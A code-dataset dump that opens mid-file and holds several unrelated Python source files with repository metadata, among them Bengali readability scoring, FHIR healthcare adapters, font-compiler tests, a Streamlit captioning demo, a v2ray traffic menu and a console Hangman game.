input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in 
range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n syllable_count.append(all_words_syllable_count[i1])\n break\n print(\"sents:\", total_sentences) \n print(\"words:\",total_words) \n print(len(my_words),\" \", len(syllable_count))\n \n total_syllables = sum(syllable_count)\n print(total_syllables)\n words_per_sent= total_words/total_sentences\n syllables_per_word = total_syllables/total_words\n \n flesch_score = 206.835 - (1.015 * words_per_sent) -(84.6 * syllables_per_word)\n print(\"flesch_score: \", round(flesch_score,2))\n \n kincaid = (0.39 * words_per_sent) + (11.8 * syllables_per_word) - 15.59\n print(\"Flesch–Kincaid grade level: \",round(kincaid,2))\n\n\"\"\"**Gunning fog Index**\n\n\n[https://www.webfx.com/tools/read-able/gunning-fog.html](https://www.webfx.com/tools/read-able/gunning-fog.html)\n\"\"\"\n\n#!pip install bnlp_toolkit\n\n#!pip install fasttext\n\nimport nltk\nnltk.download(\"punkt\")\n\nfrom bnlp.bengali_pos import BN_CRF_POS\nbn_pos = BN_CRF_POS()\nmodel_path = \"/content/drive/My Drive/Readability_dataset/bn_pos_model.pkl\"\n\ndef gunning_fog(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n syllable_count.append(all_words_syllable_count[i1])\n break\n \n complex_words = 0\n for i in range(len(s1)):\n #print(s1[i]) \n res = bn_pos.pos_tag(model_path, s1[i])\n for i1 in range(len(res)):\n if res[i1][1]!='NP' and all_words_syllable_count[all_words.index(res[i1][0])] >=3:\n complex_words = complex_words + 1\n #print( res[i1][1],\" \", res[i1][0], \" \", complex_words)\n \n \n words_per_sent= total_words/total_sentences\n complexWords_per_word = complex_words/total_words\n \n g = 0.4 * (words_per_sent + 100 * complexWords_per_word)\n \n print(\"Gunning fog index: \",round(g))\n\n\"\"\"SMOG\"\"\"\n\ndef smog(text_path):\n file1 = open(text_path,\"r\")\n text = file1.read()\n if len(text.strip()) != 0: \n s1= bengali_sentence_tokenizer1(text) \n sentence_token =[]\n for i in range(len(s1)):\n k =[]\n k = s1[i].split(\" \")\n sentence_token.append(list(filter(str.strip, k)))\n\n input_length_list = []\n for i in range(len(sentence_token)):\n input_length_list.append(len(sentence_token[i]))\n \n total_words =sum(input_length_list)\n total_sentences = len(s1)\n \n my_words =[]\n syllable_count =[]\n \n for i in range(len(sentence_token)):\n for i1 in range(len(sentence_token[i])):\n my_words.append(sentence_token[i][i1]) \n \n\n for i in range(len(my_words)):\n if my_words[i] == \"দিল\" or my_words[i] == \"পাইল\":\n syllable_count.append(2)\n \n else: \n for i1 in range(len(all_words)):\n \n if my_words[i] == all_words[i1]:\n 
syllable_count.append(all_words_syllable_count[i1])\n break\n \n number_of_polySyllables =0\n \n for i in range(len(syllable_count)):\n if syllable_count[i] >=3:\n number_of_polySyllables = number_of_polySyllables + 1\n \n\n s = 1.0430 * math.sqrt((30 * number_of_polySyllables) / total_sentences) + 3.1291\n print(\"SMOG score: \",round(s,2))","repo_name":"tafseer-nayeem/BengaliReadability","sub_path":"Code/Formula based/flesch_gunning_smog.py","file_name":"flesch_gunning_smog.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"81"} +{"seq_id":"74788065544","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\nif __name__ == '__main__':\n result = []\n # str_pattern = r\"^([a-z]{1,20}) ([a-z]{1,50}@gmail\\.com)$\"\n pattern_name = r\"^[a-z]{1,20}\"\n pattern_gmail = r\"[a-z]+@gmail\\.com{1,50}\"\n\n N = int(input())\n\n for N_itr in range(N):\n firstNameEmailID = input().split()\n\n firstName = firstNameEmailID[0]\n emailID = firstNameEmailID[1]\n\n name_match = re.search(pattern_name, firstName)\n email_match = re.search(pattern_gmail, emailID)\n \n if email_match:\n result.append(name_match.group())\n\n print(\"\\n\".join(sorted(result)))","repo_name":"diazinmotion/CodeChallenges","sub_path":"30 Days Code/28 - RegEx, Patterns, and Intro to Databases.py","file_name":"28 - RegEx, Patterns, and Intro to Databases.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41442892687","text":"from gnu_health_fhir.common.utils import safe_attrgetter\nfrom pendulum import instance\nfrom fhirclient.models.clinicalimpression import ClinicalImpression as fhir_impression\nfrom .base import BaseAdapter\nfrom .patient_adapter import Patient\nfrom .encounter_adapter import Encounter\nfrom .practitioner_adapter import Practitioner\n\n\n__all__ = [\"ClinicalImpression\"]\n\n\nclass ClinicalImpression(BaseAdapter):\n \"\"\"Immature resource somewhat equivalent to SOAP notes, H&P, etc\n\n Eventually, should support 3 models:\n - evaluations (most important)\n - roundings\n - ambulatory care\n \"\"\"\n\n @classmethod\n def to_fhir_object(cls, impression):\n jsondict = {}\n jsondict[\"identifier\"] = cls.build_fhir_identifier(impression)\n jsondict[\"status\"] = cls.build_fhir_status(impression)\n jsondict[\"code\"] = cls.build_fhir_code(impression)\n dt_or_period = cls.build_fhir_effective_datetime_or_period(impression)\n if isinstance(dt_or_period, dict):\n jsondict[\"effectivePeriod\"] = dt_or_period\n else:\n jsondict[\"effectiveDateTime\"] = dt_or_period\n jsondict[\"context\"] = cls.build_fhir_context(impression)\n jsondict[\"subject\"] = cls.build_fhir_subject(impression)\n jsondict[\"assessor\"] = cls.build_fhir_assessor(impression)\n jsondict[\"date\"] = cls.build_fhir_date(impression)\n jsondict[\"summary\"] = cls.build_fhir_summary(impression)\n return fhir_impression(jsondict=jsondict)\n\n @classmethod\n def get_fhir_object_id_from_gh_object(cls, impression):\n return impression.id\n\n @classmethod\n def get_fhir_resource_type(cls):\n return \"ClinicalImpression\"\n\n @classmethod\n def build_fhir_identifier(cls, impression):\n try:\n return [{\"value\": impression.code}]\n except:\n return None\n\n @classmethod\n def build_fhir_status(cls, impression):\n # GNU Health states - in_progress, done, signed, None\n if impression.state in [\"done\", \"signed\"] or (\n impression.evaluation_start and 
impression.evaluation_endtime\n ):\n status = \"completed\"\n elif impression.state == \"in_progress\" or impression.appointment:\n status = \"draft\"\n else:\n status = \"unknown\"\n return status\n\n @classmethod\n def build_fhir_code(cls, impression):\n # TODO More information\n return {\"text\": \"Patient evaluation\"}\n\n @classmethod\n def build_fhir_context(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(Encounter, impression)\n\n @classmethod\n def build_fhir_subject(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(\n Patient, impression.patient\n )\n\n @classmethod\n def build_fhir_effective_datetime_or_period(cls, impression):\n try:\n start = instance(impression.evaluation_start).to_iso8601_string()\n if impression.evaluation_endtime:\n end = instance(impression.evaluation_endtime).to_iso8601_string()\n return {\"start\": start, \"end\": end}\n else:\n return start\n except:\n return None\n\n @classmethod\n def build_fhir_assessor(cls, impression):\n return cls.build_fhir_reference_from_adapter_and_object(\n Practitioner, impression.healthprof\n )\n\n @classmethod\n def build_fhir_date(cls, impression):\n try:\n last = impression.write_date or impression.evaluation_start\n return instance(last).to_iso8601_string()\n except:\n return None\n\n @classmethod\n def build_fhir_summary(cls, impression):\n # Shove Objective in here - evaluation_summary\n # Shove HPI in here - present_illness + chief_complaint\n # Shove Plan in here - directions\n return \"CC: {}\\n\\nHPI: {}\\n\\nObjective: {}\\n\\nPlan: {}\".format(\n *safe_attrgetter(\n impression,\n \"chief_complaint\",\n \"present_illness\",\n \"evaluation_summary\",\n \"directions\",\n default=\"\",\n )\n )\n\n # investigation - put all the s/s, pe findings there\n # clinical_findings = {\"code\": {\"text\": \"Clinical findings\"}}\n\n # Other misc garbage\n # extras = [{'text': x} for x in safe_attrgetter(note, 'notes', 'notes_complaint', 'info_diagnosis', default='') if x.strip()]\n # if extras: jsondict['note'] = extras\n","repo_name":"teffalump/gnu_health_fhir","sub_path":"gnu_health_fhir/adapters/clinical_impression_adapter.py","file_name":"clinical_impression_adapter.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"31471961063","text":"#Code written by Jason Whitmore\n#WWU CSCI 491/2/3\n\n#This script creates a \"real time\" plot of predictions based on csv files that have columns\n#[timestep, human mean, human stddev, bot mean, bot stddev]\n\n#v 3.2.1\nfrom matplotlib import pyplot\n\n#v 1.14.5\nimport numpy as np\n\n#v 0.25.3\nimport pandas as pd\n\nSECONDS_OF_DATA = 60\n\nREALTIME_PREDICTIONS_CSV_PATH = \"realtime/realtime_\" + str(SECONDS_OF_DATA) + \".csv\"\n\nFRAME_SCALAR = 1.0 / 24.0\n\nHUMAN_COLOR = \"green\"\n\nBOT_COLOR = \"red\"\n\nALPHA = 0.5\n\n\n\nPLOT_TITLE = \"Real time detector predictions (trained on \" + str(SECONDS_OF_DATA) + \" seconds of gameplay)\"\n\n\nX_AXIS_LABEL = \"Time from start of match (s)\"\n\nX_AXIS_MIN = 0\n\nX_AXIS_MAX = SECONDS_OF_DATA\n\nX_AXIS_STEPSIZE = 5\n\n\nY_AXIS_LABEL = \"Detector prediction\"\n\nY_AXIS_MIN = 0\n\nY_AXIS_MAX = 1\n\nY_AXIS_STEPSIZE = 0.1\n\n\n#Load into a numpy array\n\ndata = pd.read_csv(REALTIME_PREDICTIONS_CSV_PATH).values\n\n#Scale the frame number column to be in terms of seconds passed\n\nfor i in range(len(data)):\n data[i][0] *= FRAME_SCALAR\n\n#Isolate the rows and insert into own np 
arrays\n\nseconds = []\n\nh_mean = []\nh_std = []\n\nb_mean = []\nb_std = []\n\nfor i in range(len(data)):\n seconds.append(data[i][0])\n\n h_mean.append(data[i][1])\n h_std.append(data[i][2])\n\n b_mean.append(data[i][3])\n b_std.append(data[i][4])\n\nseconds = np.array(seconds)\n\nh_mean = np.array(h_mean)\nh_std = np.array(h_std)\n\nb_mean = np.array(b_mean)\nb_std = np.array(b_std)\n\n\npyplot.plot(seconds, h_mean, HUMAN_COLOR)\npyplot.fill_between(seconds, h_mean + h_std, h_mean - h_std, color=HUMAN_COLOR, alpha=ALPHA)\n\npyplot.plot(seconds, b_mean, BOT_COLOR)\npyplot.fill_between(seconds, b_mean + b_std, b_mean - b_std, color=BOT_COLOR, alpha=ALPHA)\n\npyplot.title(PLOT_TITLE)\n\npyplot.xlabel(X_AXIS_LABEL)\npyplot.xlim(X_AXIS_MIN, X_AXIS_MAX)\npyplot.xticks(np.arange(X_AXIS_MIN, X_AXIS_MAX + 1, X_AXIS_STEPSIZE))\n\npyplot.ylabel(Y_AXIS_LABEL)\npyplot.ylim(0,1)\npyplot.yticks(np.arange(Y_AXIS_MIN, Y_AXIS_MAX + 0.1, Y_AXIS_STEPSIZE))\n\npyplot.legend([\"Human predictions\", \"Bot predictions\"])\n\npyplot.show()\n","repo_name":"tsikerdekis/starcraft-bot-detection","sub_path":"evaluations/realtime_plotter.py","file_name":"realtime_plotter.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41522809810","text":"import numpy as np\r\ndef outliers_whiskers(feature_name=None, df=None, l_whis=1.5, u_whis=1.5):\r\n # apply after cluster but w/o exclude bad range\r\n Throw_Feature = df[feature_name]\r\n quartile_1, median, quartile_3 = 25 , 50, 75\r\n Q1, median, Q3 = np.percentile(np.asarray(Throw_Feature), [quartile_1, median, quartile_3])\r\n IQR = Q3 - Q1\r\n loval = Q1 - 1.5 * IQR\r\n hival = Q3 + 1.5 * IQR\r\n wisklo = np.compress(Throw_Feature >= loval, Throw_Feature)\r\n wiskhi = np.compress(Throw_Feature <= hival, Throw_Feature)\r\n lower_bound = np.min(wisklo)\r\n upper_bound = np.max(wiskhi)\r\n return (lower_bound, upper_bound)\r\n","repo_name":"caseyhcjen/tool","sub_path":"data_proc_tool.py","file_name":"data_proc_tool.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7684861429","text":"#!/usr/bin/python3\n\"\"\"Write a script that adds all arguments to a Python list,\nand then save them to a file\nYou must use your function save_to_json_file from 5-save_to_json_file.py\nYou must use your function load_from_json_file from 6-load_from_json_file.py\nThe list must be saved as a JSON representation in a file named add_item.json\nYou don’t need to manage arguments passed to the script (see example below)\"\"\"\n\n\nimport sys\nsave_to_json_file = __import__('5-save_to_json_file').save_to_json_file\nload_from_json_file = __import__('6-load_from_json_file').load_from_json_file\n\ntry:\n my_list = load_from_json_file(\"add_item.json\")\nexcept:\n my_list = []\nfor i in range(1, len(sys.argv)):\n my_list.append(sys.argv[i])\nsave_to_json_file(my_list, \"add_item.json\")\n","repo_name":"Nomad-Rob/holbertonschool-higher_level_programming","sub_path":"python-input_output/7-add_item.py","file_name":"7-add_item.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29062536303","text":"import unittest\nimport mock\nimport webapp2\nimport webtest\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import testbed\n\nimport main\n# [END imports]\n\n\nclass 
AppTest(unittest.TestCase):\n\n def setUp(self):\n app = webapp2.WSGIApplication([('/api/draw.*',\n main.ImageRequestHandler)])\n self.testapp = webtest.TestApp(app)\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n # Next, declare which service stubs you want to use.\n self.testbed.init_datastore_v3_stub()\n self.testbed.init_memcache_stub()\n self.testbed.init_urlfetch_stub()\n # Clear ndb's in-context cache between tests.\n # This prevents data from leaking between tests.\n # Alternatively, you could disable caching by\n # using ndb.get_context().set_cache_policy(False)\n ndb.get_context().clear_cache()\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def test_get_path_id(self):\n self.assertEqual('abc', main.get_path_id('123/456/abc'))\n\n def test_get_odds_ratio(self):\n risk = '1:100'\n self.assertEqual('1:100', main.get_odds_ratio(risk))\n risk = '0.1'\n self.assertEqual('1:10', main.get_odds_ratio(risk))\n risk = '123'\n with self.assertRaises(ValueError):\n main.get_odds_ratio(risk)\n risk = '100:50'\n with self.assertRaises(ValueError):\n main.get_odds_ratio(risk)\n\n def test_get_standout_fraction(self):\n frac = '0.5'\n self.assertEqual(0.5, main.get_standout_fraction(frac))\n # Test default\n frac = 'abc'\n self.assertEqual(0.0, main.get_standout_fraction(frac))\n\n def test_get_color(self):\n # Test hex\n color_param = 'ff00dd'\n default = 'black'\n self.assertEqual('#ff00dd', main.get_color(color_param, default))\n # Test default\n color_param = None\n self.assertEqual('black', main.get_color(color_param, default))\n # Test string color\n color_param = 'red'\n self.assertEqual('red', main.get_color(color_param, default))\n\n def test_get_shape(self):\n # Test arg\n shape_req = 'circle'\n self.assertEqual('circle', main.get_shape(shape_req))\n # test default\n shape_req = None\n self.assertEqual('square', main.get_shape(shape_req))\n\n def test_get_position(self):\n # Test arg\n pos_req = '1'\n self.assertTrue(main.get_position(pos_req))\n pos_req = '0'\n self.assertFalse(main.get_position(pos_req))\n # test default\n pos_req = 'abc'\n self.assertFalse(main.get_position(pos_req))\n\n def test_get_filetype(self):\n # Test arg\n req = 'png'\n self.assertEqual('png', main.get_filetype(req))\n # test default\n req = 'abc'\n self.assertEqual('svg', main.get_filetype(req))\n\n # Test the handler\n @mock.patch('main.get_filetype')\n @mock.patch('main.get_position')\n @mock.patch('main.get_shape')\n @mock.patch('main.get_odds_ratio')\n @mock.patch('draw.create_img')\n @mock.patch('main.get_color')\n @mock.patch('main.get_standout_fraction')\n def test_ImageRequestHandler(self, get_frac, get_color, create_img, get_o,\n get_shape, get_pos, get_ft):\n get_ft.return_value = 'svg'\n get_frac.return_value = 0.75\n get_color.return_value = 'orange'\n get_o.return_value = '1:50'\n get_pos.return_value = True\n get_shape.return_value = 'square'\n # Test all params except filetype\n params = {\n 'odds': '1:100',\n 'shape': 'circle',\n 'color1': 'blue',\n 'color2': 'green',\n 'index': '0.5',\n 'right': '1',\n 'w': '500',\n 'num_wide': '500'\n }\n response = self.testapp.get('/api/draw/', params)\n # Check color2 called ok\n get_color.selfAssertTrue([mock.call('blue', 'black'),\n mock.call('green', 'red')],\n get_color.call_args_list)\n # Check get_frac called ok\n get_frac.assert_called_with('0.5')\n # Check get_odds_ratio called ok\n get_o.assert_called_with('1:100')\n # Check create_img called ok\n create_img.assert_called_with('1:50', shape='square',\n color1='orange', 
color2='orange',\n standout_frac=0.75, right=True,\n width=500, num_wide=500)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(response.content_type, 'image/svg+xml')\n\n # Test with no width arg\n get_ft.return_value = 'svg'\n params = {\n 'odds': '1:100',\n 'shape': 'circle',\n 'color1': 'blue',\n 'color2': 'green',\n 'index': '0.5',\n 'right': '1',\n 'num_wide': 500,\n 'type': 'png'\n }\n response = self.testapp.get('/api/draw/', params)\n create_img.assert_called_with('1:50', shape='square',\n color1='orange', color2='orange',\n standout_frac=0.75, right=True,\n num_wide=500)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(response.content_type, 'image/svg+xml')\n\n # Test bad odds provided\n get_o.side_effect = ValueError()\n params = {}\n response = self.testapp.get('/api/draw/', params, status=400)\n self.assertEqual(response.status_int, 400)\n\n\n# [START main]\nif __name__ == '__main__':\n unittest.main()\n# [END main]\n","repo_name":"michaeljboyle/picturisk","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28995703086","text":"import asyncio\nimport os\nimport pytest\nfrom fontTools.ufoLib import UFOReader\nfrom fontgoggles.compile.ufoCompiler import fetchCharacterMappingAndAnchors\nfrom fontgoggles.compile.compilerPool import compileUFOToPath\nfrom testSupport import getFontPath\n\n\ndef test_ufoCharacterMapping():\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n reader = UFOReader(ufoPath)\n cmap, revCmap, anchors = fetchCharacterMappingAndAnchors(reader.getGlyphSet(), ufoPath)\n assert cmap[0x0041] == \"A\"\n assert revCmap[\"A\"] == [0x0041]\n # MutatorSansBoldWideMutated.ufo/glyphs/A_.glif contains a commented-out <unicode>\n # tag, that must not be parsed, as well as a commented-out <anchor>.\n assert 0x1234 not in cmap\n assert anchors == {\n \"A\": [(\"top\", 645, 815)],\n \"E\": [(\"top\", 582.5, 815)],\n \"macroncmb\": [(\"_top\", 0, 815)],\n \"asteriskabovecmb\": [(\"_top\", 153, 808)],\n \"asteriskbelowcmb\": [(\"_top\", 153, 808)],\n }\n\n\ndef test_ufoCharacterMapping_glyphNames():\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n reader = UFOReader(ufoPath)\n cmap, revCmap, anchors = fetchCharacterMappingAndAnchors(reader.getGlyphSet(), ufoPath, [\"A\"])\n assert cmap[0x0041] == \"A\"\n assert revCmap[\"A\"] == [0x0041]\n assert anchors == {\"A\": [(\"top\", 645, 815)]}\n\n\n@pytest.mark.asyncio\nasync def test_compileUFOToPath(tmpdir):\n ufoPath = getFontPath(\"MutatorSansBoldWideMutated.ufo\")\n ttPath = tmpdir / \"test.ttf\"\n output = []\n error = await compileUFOToPath(ufoPath, ttPath, output.append)\n output = \"\".join(output)\n assert ttPath.exists()\n assert os.stat(ttPath).st_size > 0\n assert not error\n assert output == \"\"\n\n\n@pytest.mark.asyncio\nasync def test_compileUFOToPathMultiple(tmpdir):\n ufoPaths = [\n getFontPath(\"MutatorSansBoldCondensed.ufo\"),\n getFontPath(\"MutatorSansBoldWide.ufo\"),\n getFontPath(\"MutatorSansIntermediateCondensed.ufo\"),\n getFontPath(\"MutatorSansIntermediateWide.ufo\"),\n getFontPath(\"MutatorSansLightCondensed.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.S.middle.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.S.wide.ufo\"),\n getFontPath(\"MutatorSansLightCondensed_support.crossbar.ufo\"),\n getFontPath(\"MutatorSansLightWide.ufo\"),\n ]\n ttPaths = [tmpdir / (u.name + \".ttf\") 
for u in ufoPaths]\n output = []\n coros = (compileUFOToPath(u, t, output.append) for u, t in zip(ufoPaths, ttPaths))\n results = await asyncio.gather(*coros)\n assert results == [None] * len(results)\n assert [(os.stat(p).st_size > 0) for p in ttPaths] == [True] * len(results)\n","repo_name":"justvanrossum/fontgoggles","sub_path":"Tests/test_ufoCompiler.py","file_name":"test_ufoCompiler.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":362,"dataset":"github-code","pt":"81"} +{"seq_id":"4259606422","text":"from django.db.models import Exists, OuterRef, Q\nfrom django.db.models.deletion import CASCADE, get_candidate_relations_to_delete\n\nfrom datahub.core.model_helpers import get_related_fields\n\n\ndef get_unreferenced_objects_query(\n model,\n excluded_relations=(),\n relation_exclusion_filter_mapping=None,\n):\n \"\"\"\n Generates a query set of unreferenced objects for a model.\n\n :param model: the model to generate a query set of unreferenced objects\n :param excluded_relations: related fields on model that should be ignored\n :param relation_exclusion_filter_mapping:\n Optional mapping of relations (fields on model) to Q objects.\n For each relation where a Q object is provided, the Q object is used to exclude\n objects for that relation prior to checking if any references to the model exist (for\n that relation).\n\n Example:\n This example will not consider interactions dated before 2015-01-01 when getting\n unreferenced companies.\n\n get_unreferenced_objects_query(\n Company,\n relation_exclusion_filter_mapping={\n Company._meta.get_field('interactions'): Q(date__lt=date(2015, 1, 1),\n }\n )\n\n :returns: queryset for unreferenced objects\n\n \"\"\"\n if relation_exclusion_filter_mapping is None:\n relation_exclusion_filter_mapping = {}\n\n fields = set(get_related_fields(model)) - set(excluded_relations)\n\n if relation_exclusion_filter_mapping.keys() - fields:\n raise ValueError('Invalid fields detected in relation_exclusion_filter_mapping.')\n\n q = Q()\n\n for field in fields:\n related_field = field.field\n exclusion_filters = relation_exclusion_filter_mapping.get(field, Q())\n subquery = related_field.model.objects.filter(\n **{related_field.attname: OuterRef('pk')},\n ).exclude(\n exclusion_filters,\n ).only('pk')\n q &= Q(~Exists(subquery))\n\n return model.objects.filter(q)\n\n\ndef get_relations_to_delete(model):\n \"\"\"\n Returns all the fields of `model` that point to models which would get deleted\n (on cascade) as a result this model getting deleted.\n\n :param model: model class\n :returns: list of fields of `model` that point to models deleted in cascade\n \"\"\"\n candidates = get_candidate_relations_to_delete(model._meta)\n return [\n field for field in candidates\n if field.field.remote_field.on_delete == CASCADE\n ]\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/cleanup/query_utils.py","file_name":"query_utils.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"43435483207","text":"from transformers import pipeline\nimport streamlit as st\nfrom PIL import Image\n\ncaptioner = pipeline(model=\"ydshieh/vit-gpt2-coco-en\")\n\n\nst.title('Image To Text')\n\nwith st.form('app'):\n upload_file = st.file_uploader(\"이미지 파일을 올려주세요.\")\n submit = st.form_submit_button('분석!')\n if submit:\n image = Image.open(upload_file)\n result = captioner(image)[0]['generated_text']\n st.image(image)\n 
st.subheader('분석 결과')\n st.text(result)\n\n\n","repo_name":"Dcom-KHU/image-to-text-demo-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5181641578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\n\nfrom loader import Loader\nfrom utils import ColorStr, calcul_iptables_traffic\n\nloader = Loader()\n\nprofile = loader.profile\n\ngroup_list = profile.group_list\n\nwhile True:\n print(\"Iptables 端口流量统计\")\n print(\"\")\n print(\"1.查看流量统计\\n\")\n print(\"2.重置流量统计\\n\")\n print(\"tip: v2ray功能端口默认自动开启iptables的流量统计\\n\")\n\n choice = input(\"请输入数字选择功能:\")\n if choice == \"1\":\n print(\"\")\n for group in group_list:\n print(calcul_iptables_traffic(group.port))\n print(\"\")\n\n elif choice == \"2\":\n port = input(\"请输入要重置流量的端口:\")\n if port and port.isnumeric():\n os.system(\"bash /usr/local/v2rayU/global_setting/clean_traffic.sh {}\".format(str(port)))\n else:\n print(ColorStr.red(\"输入有误!\"))\n else:\n break","repo_name":"BenJamesbabala/v2rayU","sub_path":"global_setting/iptables_ctr.py","file_name":"iptables_ctr.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13921489150","text":"# Project Name: Hangman\n# Version: 1.0\n# Author: Brendan Langenhoff (brend-designs)\n# Description: A simple game of Hangman using console/terminal\n\n# TODO: Update to using a GUI instead of console\n\nimport random\nimport enum\nfrom words import word_list\n\n\n# Store game variables in a class/object, for easier passing between functions.\nclass Game:\n word = \"\"\n word_completion = \"\"\n guessed = False\n guessed_letters = []\n guessed_words = []\n tries = 6\n\n def __init__(self, word):\n self.word = word\n self.word_completion = \"_\" * len(word)\n\n\n# Enum for types of guesses during the game\nclass GuessType(enum.Enum):\n LETTER = \"letter\"\n WORD = \"word\"\n\n\n# Get a random word from a static list defined in words.py\ndef get_word(): return random.choice(word_list).upper()\n\n\n# This function renders the game within the console\n# Parameters:\n# \"game\": Reference to our game object\n# \"starting\": True if game is starting, else false\ndef render(game, starting):\n if starting:\n print(\"Let's play Hangman!\")\n print(display_hangman(game.tries) + \"\\n\"\n + game.word_completion + \"\\n\")\n\n\n# This function adds a letter or word, to the guessed letters or words list.\n# Parameters:\n# \"game\": Reference to our game object\n# \"guess_type\": Type of guess (letter or word)\n# \"guess\": The letter or word that's been guessed\n# \"count-try\": Count this guess against their number of tries\ndef add_guess(game, guess_type, guess, count_try):\n if count_try:\n game.tries -= 1\n\n if guess_type == GuessType.LETTER:\n game.guessed_letters.append(guess)\n else:\n game.guessed_words.append(guess)\n\n\n# This function updates the completion of the word\n# Parameters:\n# \"game\": Reference to our game object\n# \"guess_type\": Type of guess (letter or word)\n# \"guess\": The letter or word that's been guessed\ndef update_word_completion(game, guess_type, guess):\n if guess_type == GuessType.WORD:\n game.word_completion = game.word\n else:\n word_as_list = list(game.word_completion)\n\n # Iterate through word to find the indexes of where this letter is within said word\n indices = [i for i, letter in enumerate(game.word) if letter 
== guess]\n\n for index in indices: # Loop through indexes of the guessed letter within the word\n word_as_list[index] = guess\n game.word_completion = \"\".join(word_as_list)\n\n if \"_\" not in game.word_completion: # Word has been guessed\n game.guessed = True\n\n\n# This function handles the game (Hangman) logic.\n# Parameter: \"word\": The random word that is trying to be guessed.\ndef play(word):\n game = Game(word)\n render(game, True)\n\n while not game.guessed and game.tries > 0:\n guess = input(\"Please guess a letter or word: \").upper()\n\n if len(guess) == 1 and guess.isalpha():\n guess_type = GuessType.LETTER\n\n if guess in game.guessed_letters:\n print(\"You already guessed the letter\", guess)\n elif guess not in word:\n print(guess, \"is not in the word.\")\n add_guess(game, guess_type, guess, True)\n else:\n print(\"Good job,\", guess, \"is in the word!\")\n add_guess(game, guess_type, guess, False)\n update_word_completion(game, guess_type, guess)\n elif len(guess) == len(word) and guess.isalpha():\n guess_type = GuessType.WORD\n\n if guess in game.guessed_words:\n print(\"You already guessed the word\", guess)\n elif guess != word:\n print(guess, \"is not the word.\")\n add_guess(game, guess_type, guess, True)\n else:\n game.guessed = True\n update_word_completion(game, guess_type, guess)\n else:\n print(\"Not a valid guess.\")\n render(game, False) # Re-render Hangman\n\n if game.guessed:\n print(\"Congrats, you guessed the word! You win!\")\n else:\n print(\"Sorry, you ran out of tries. The word was \" +\n word + \". Maybe next time!\")\n\n\n# This function just lays out Hangman at a particular stage/try.\n# Putting this towards the end as it's quite a long function.\ndef display_hangman(tries):\n stages = [ # Final state: head, torso, both arms, and both legs\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \\\\\n -\n \"\"\",\n # Head, torso, both arms, and one leg\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \n -\n \"\"\",\n # Head, torso, and both arms\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | \n -\n \"\"\",\n # Head, torso, and one arm\n \"\"\"\n --------\n | |\n | O\n | \\\\|\n | |\n | \n -\n \"\"\",\n # Head and torso\n \"\"\"\n --------\n | |\n | O\n | |\n | |\n | \n -\n \"\"\",\n # Head\n \"\"\"\n --------\n | |\n | O\n | \n | \n | \n -\n \"\"\",\n # Initial empty state\n \"\"\"\n --------\n | |\n | \n | \n | \n | \n -\n \"\"\"\n ]\n return stages[tries]\n\n\ndef main():\n word = get_word()\n play(word)\n while input(\"Play Again? 
